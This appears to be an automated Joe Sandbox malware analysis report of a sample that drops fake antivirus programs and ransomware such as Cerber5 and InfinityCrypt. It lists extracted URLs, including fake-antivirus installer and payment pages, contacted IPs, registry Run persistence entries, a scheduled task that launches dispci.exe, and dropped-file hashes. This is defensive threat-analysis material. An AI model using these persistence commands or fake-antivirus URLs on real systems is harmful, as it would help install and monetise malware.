                                                                                              https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000005.00000003.317496447.000001D18F45A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://wallup.nethttp://wallup.nethttp://wallup.netEndermanch@DeriaLock.exe, 0000001B.00000000.423229039.0000000000A22000.00000002.00000001.01000000.00000016.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000005.00000003.317571205.000001D18F441000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.318134090.000001D18F442000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.317521786.000001D18F440000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.vikingwebscanner.com/scripts/new_install.php?owner=Endermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, 6AdwCleaner.exe, 00000034.00000000.468943690.0000000000A52000.00000002.00000001.01000000.00000022.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://www.clamav.netavpc2009.exe, 00000029.00000000.458422834.0000000000516000.00000002.00000001.01000000.0000001D.sdmpfalse
                                                                                                    high
                                                                                                    http://www.bingmapsportal.comsvchost.exe, 00000005.00000002.317915221.000001D18F413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.bzip.orgDVarFileInfo$bzip2.dll.14.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      low
                                                                                                      http://diskcryptor.net/rundll32.exe, 00000014.00000003.431911084.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, dispci.exe.20.drfalse
                                                                                                        high
                                                                                                        http://www.vikingwebscanner.com/scripts/paymore.phpEndermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, 6AdwCleaner.exe, 00000034.00000000.468943690.0000000000A52000.00000002.00000001.01000000.00000022.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000005.00000003.317545966.000001D18F456000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://gnuwin32.sourceforge.netEndermanch@AnViPC2009.exe, 0000000E.00000003.404319337.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, bzip2.dll.14.drfalse
                                                                                                            high
                                                                                                            http://bugs.clamav.netavpc2009.exe, 00000029.00000000.458422834.0000000000516000.00000002.00000001.01000000.0000001D.sdmpfalse
                                                                                                              high
                                                                                                              https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000005.00000002.318099990.000001D18F43D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.baidu.com/s?wd=%E6%80%8E%E4%B9%88%E5%AE%89%E8%A3%85%20tor%20%E6%B5%8F%E8%A7%88%E5%99%A8Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://wallup.netEndermanch@DeriaLock.exe, 0000001B.00000000.423229039.0000000000A22000.00000002.00000001.01000000.00000016.sdmpfalse
                                                                                                                    high
                                                                                                                    http://nsis.sf.net/NSIS_ErrorErrorEndermanch@FakeAdwCleaner.exe, 00000020.00000000.432949028.0000000000409000.00000008.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drfalse
                                                                                                                      high
                                                                                                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000005.00000002.317915221.000001D18F413000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.318099990.000001D18F43D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000005.00000003.317466047.000001D18F462000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000005.00000003.317521786.000001D18F440000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.navashield.com/83886080NavaEndermanch@NavaShield.exe.0.drfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://arizonacode.bplaced.net/HF/SystemLocker/unlock-everybody.txtEndermanch@DeriaLock.exe, 0000001B.00000000.424660470.0000000000A66000.00000002.00000001.01000000.00000016.sdmpfalse
                                                                                                                              high
                                                                                                                              https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000005.00000002.318466883.000001D18F45C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.317496447.000001D18F45A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://nsis.sf.net/NSIS_ErrorEndermanch@FakeAdwCleaner.exe, 00000020.00000000.432949028.0000000000409000.00000008.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drfalse
                                                                                                                                  high
                                                                                                                                  http://checkeds.com/customers/installer.php?pid=AVT_BASICEndermanch@Antivirus.exe, 0000000B.00000000.380424832.00000000004AE000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://dynamic.tsvchost.exe, 00000005.00000002.318621235.000001D18F465000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.318134090.000001D18F442000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.317521786.000001D18F440000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.vikingwebscanner.com/scripts/status.php?action=Endermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, 6AdwCleaner.exe, 00000034.00000000.468943690.0000000000A52000.00000002.00000001.01000000.00000022.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000005.00000003.317466047.000001D18F462000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://www.youtube.com/results?search_query=InstallEndermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000005.00000002.318466883.000001D18F45C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.317496447.000001D18F45A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000005.00000002.318466883.000001D18F45C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.317496447.000001D18F45A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000005.00000003.317496447.000001D18F45A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://www.happyantivirus.co.cc/register.htmlEndermanch@HappyAntivirus.exe, 00000027.00000000.459071354.0000000000FD8000.00000002.00000001.01000000.0000001B.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.clamav.net/bugsavpc2009.exe, 00000029.00000000.458422834.0000000000516000.00000002.00000001.01000000.0000001D.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://poetry.rotten.com/lightning/Endermanch@Krotten.exe.0.drfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000005.00000003.317466047.000001D18F462000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000005.00000002.318099990.000001D18F43D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000005.00000003.317571205.000001D18F441000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.318134090.000001D18F442000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.317521786.000001D18F440000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://www.vikingwebscanner.com/succes/index.php#pictureBox1.ImageEndermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, 6AdwCleaner.exe, 00000034.00000000.468943690.0000000000A52000.00000002.00000001.01000000.00000022.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000005.00000003.317466047.000001D18F462000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000005.00000003.317521786.000001D18F440000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://paypal.com/http://xhamster.com/http://visa.com/91.194.254.16download-defendersupport-defenderEndermanch@SecurityDefener2015.exe.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                            87.98.177.219
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.218
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.215
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.214
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.217
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.216
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.211
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.210
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.213
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.212
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.208
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.207
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.209
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.204
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.203
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.206
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.205
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.200
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.202
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.201
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.2
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.1
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.4
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.3
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.0
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.9
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.6
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.5
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.8
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.7
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            95.1.200.1
                                                                                                                                                            unknownTurkey
                                                                                                                                                            9121TTNETTRfalse
                                                                                                                                                            87.98.177.237
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            95.1.200.2
                                                                                                                                                            unknownTurkey
                                                                                                                                                            9121TTNETTRfalse
                                                                                                                                                            87.98.177.236
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.239
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            95.1.200.0
                                                                                                                                                            unknownTurkey
                                                                                                                                                            9121TTNETTRfalse
                                                                                                                                                            87.98.177.238
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            95.1.200.5
                                                                                                                                                            unknownTurkey
                                                                                                                                                            9121TTNETTRfalse
                                                                                                                                                            87.98.177.233
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            95.1.200.6
                                                                                                                                                            unknownTurkey
                                                                                                                                                            9121TTNETTRfalse
                                                                                                                                                            87.98.177.232
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            95.1.200.3
                                                                                                                                                            unknownTurkey
                                                                                                                                                            9121TTNETTRfalse
                                                                                                                                                            87.98.177.235
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            95.1.200.4
                                                                                                                                                            unknownTurkey
                                                                                                                                                            9121TTNETTRfalse
                                                                                                                                                            87.98.177.234
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            95.1.200.9
                                                                                                                                                            unknownTurkey
                                                                                                                                                            9121TTNETTRfalse
                                                                                                                                                            95.1.200.7
                                                                                                                                                            unknownTurkey
                                                                                                                                                            9121TTNETTRfalse
                                                                                                                                                            87.98.177.231
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            95.1.200.8
                                                                                                                                                            unknownTurkey
                                                                                                                                                            9121TTNETTRfalse
                                                                                                                                                            87.98.177.230
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.178.249
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.178.248
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.178.247
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.178.246
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.179.97
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.179.96
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.179.99
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.179.98
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.178.241
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.179.93
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.178.240
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.179.92
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.179.95
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.179.94
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.178.245
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.178.244
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.178.243
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.179.91
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.178.242
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.179.90
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.229
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.226
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.225
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.228
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.227
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.222
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.221
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.224
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.223
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.177.220
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.178.252
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.178.251
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.178.250
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.178.255
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.178.254
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.178.253
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            93.107.12.20
                                                                                                                                                            unknownIreland
                                                                                                                                                            15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                            93.107.12.21
                                                                                                                                                            unknownIreland
                                                                                                                                                            15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                            93.107.12.22
                                                                                                                                                            unknownIreland
                                                                                                                                                            15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                            93.107.12.23
                                                                                                                                                            unknownIreland
                                                                                                                                                            15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                            93.107.12.24
                                                                                                                                                            unknownIreland
                                                                                                                                                            15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                            93.107.12.25
                                                                                                                                                            unknownIreland
                                                                                                                                                            15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                            93.107.12.26
                                                                                                                                                            unknownIreland
                                                                                                                                                            15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                            93.107.12.27
                                                                                                                                                            unknownIreland
                                                                                                                                                            15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                            93.107.12.28
                                                                                                                                                            unknownIreland
                                                                                                                                                            15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                            93.107.12.29
                                                                                                                                                            unknownIreland
                                                                                                                                                            15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                            87.98.178.227
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.179.79
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.178.226
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            87.98.179.78
                                                                                                                                                            unknownFrance
                                                                                                                                                            16276OVHFRfalse
                                                                                                                                                            Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                                            Analysis ID:712613
                                                                                                                                                            Start date and time:2022-09-29 14:43:37 +02:00
                                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                                            Overall analysis duration:0h 15m 40s
                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                            Report type:full
                                                                                                                                                            Sample file name:bpkAAJptGv.exe
                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                            Number of analysed new started processes analysed:66
                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                            Technologies:
                                                                                                                                                            • HCA enabled
                                                                                                                                                            • EGA enabled
                                                                                                                                                            • HDC enabled
                                                                                                                                                            • AMSI enabled
                                                                                                                                                            Analysis Mode:default
                                                                                                                                                            Analysis stop reason:
                                                                                                                                                            Detection:MAL
                                                                                                                                                            Classification:mal100.rans.spre.troj.spyw.expl.evad.winEXE@116/215@70/100
                                                                                                                                                            EGA Information:
                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                            HDC Information:
                                                                                                                                                            • Successful, ratio: 99.3% (good quality ratio 96.4%)
                                                                                                                                                            • Quality average: 86.9%
                                                                                                                                                            • Quality standard deviation: 22.8%
                                                                                                                                                            HCA Information:
                                                                                                                                                            • Successful, ratio: 99%
                                                                                                                                                            • Number of executed functions: 135
                                                                                                                                                            • Number of non-executed functions: 116
                                                                                                                                                            Cookbook Comments:
                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                            • Connection to analysis system has been lost, crash info: Unknown
                                                                                                                                                            • Exclude process from analysis (whitelisted): Conhost.exe
                                                                                                                                                            • Excluded domains from analysis (whitelisted): secure1.safe-scanerwas.com, google.com, fs.microsoft.com, searchaccount.org, login.live.com, www5.internet-security-guard.com, watson.telemetry.microsoft.com, ashamedice.com, secure2.simplenetworkzqi.com
                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                            • VT rate limit hit for: bpkAAJptGv.exe
                                                                                                                                                            TimeTypeDescription
                                                                                                                                                            14:45:52AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run system C:\Users\user\Desktop\Endermanch@Birele.exe
                                                                                                                                                            14:46:02Task SchedulerRun new task: rhaegal path: C:\Windows\system32\cmd.exe s>/C Start "" "C:\Windows\dispci.exe" -id 1382722661 &amp;&amp; exit
                                                                                                                                                            14:46:02AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run system C:\Users\user\Desktop\Endermanch@Birele.exe
                                                                                                                                                            14:46:22AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Antivirus "C:\Program Files (x86)\AnVi\avt.exe" -noscan
                                                                                                                                                            14:46:44AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SoftProz C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe
                                                                                                                                                            14:48:01AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Client Server Runtime Subsystem "C:\ProgramData\Windows\csrss.exe"
                                                                                                                                                            No context
                                                                                                                                                            No context
                                                                                                                                                            No context
                                                                                                                                                            No context
                                                                                                                                                            No context
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):14560
                                                                                                                                                            Entropy (8bit):7.9871213710154
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:G3oL4GUxMKIUyGHQykpUVA8tz04t6pdXRWkEA:GYL5uM2yGTVZtArPRFj
                                                                                                                                                            MD5:D9EBA92DF00E23A4F85A9B6813401108
                                                                                                                                                            SHA1:67F2320B3DE749925D1474D1B0CB04893927A999
                                                                                                                                                            SHA-256:1A3A1FB78F873C3813C78FA1016D0CEFEC58D30A15ACDAE21139E9974469C644
                                                                                                                                                            SHA-512:14BEC938A74F1F6F033376E5EEDFE9F2BB91190845B90A623571AFF59104CC6217C0EC6B5A2F3E977988302E39A76C9361DD4C2A3D53B4555E4CB14070890B60
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..\..dWLS........".{...i/O..:{......z.A..A...7}V........f*...Yn8.....5.te6m../g..m1....uiI....a..2).w.8|..$n...a4.FV.$s.-J.^.UT...#H.".. .3)w.'...~l.Z............~.B...X.X..R...@-K\#....M.....s..v.&.`.s*....!|.....'..h.[..[.i Q.q.*...<.ou,~..D.hA...5...a.T[.6`.........F..N.]...[....O.c........{.bG.PG...W...\G>....s. ,.U...........~..QxpM......C...XO..?..B.u.P.....DC..F.U.$"zI.C-{..+.F00.L...n.....o.......h......."...;1).SG7....b3.J......%.,..K..E....u..se...M.)..#w:).'..!u........~.......K...K....K....|%JA..^..sG...Ys........R<..f...d7M9...2.g.(.3oZ...T....\.6...sH.h....s.Y..d8.].41.>..3.".pm.cg.8v......~4..V.E8q.....7:Jk..hR....|_..0..;... \v1....6c....G...W|e..4...&.'r..(0...:.P,ag.[.3...$p.d....;.....3.....C%..3....]vV...=......]u...=..Q..a..u.k-X...>i........#.S.G.;.[....2..p.g.aGR.....=.......\.k.\...*T.nb.{...O.LH..s.p...cI.7..7..t.*'w.!.-*c......!.:..........fh.......T.v.h+.....31$.x.U!'W69..}s......?...A..7e.G.`...O.'%......0.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):431456
                                                                                                                                                            Entropy (8bit):7.9995552839833985
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:12288:/LEzJgSJ6SIj4etEfKWPMwUR8gpJ3SL/S65:/LEzJIj/2KWPM/r3SL665
                                                                                                                                                            MD5:D69A3ABE577A8F154395DF989BD2D966
                                                                                                                                                            SHA1:CBAD5C8AE01CA4BF1FB2C7B233DAFA58DD5BD9B5
                                                                                                                                                            SHA-256:E46D7FE8E3E02BDEEF7CB675B73F81B67477BE9AD72899893A8E85F272A3D028
                                                                                                                                                            SHA-512:7BDB25F72117DE8DF259E65E1420E528DCB5018DC8F8892FEBE7CBDA0AEAE96BE6A6DB133FF08227D2679125943D33F327E6349175A78E313B7296145062063A
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
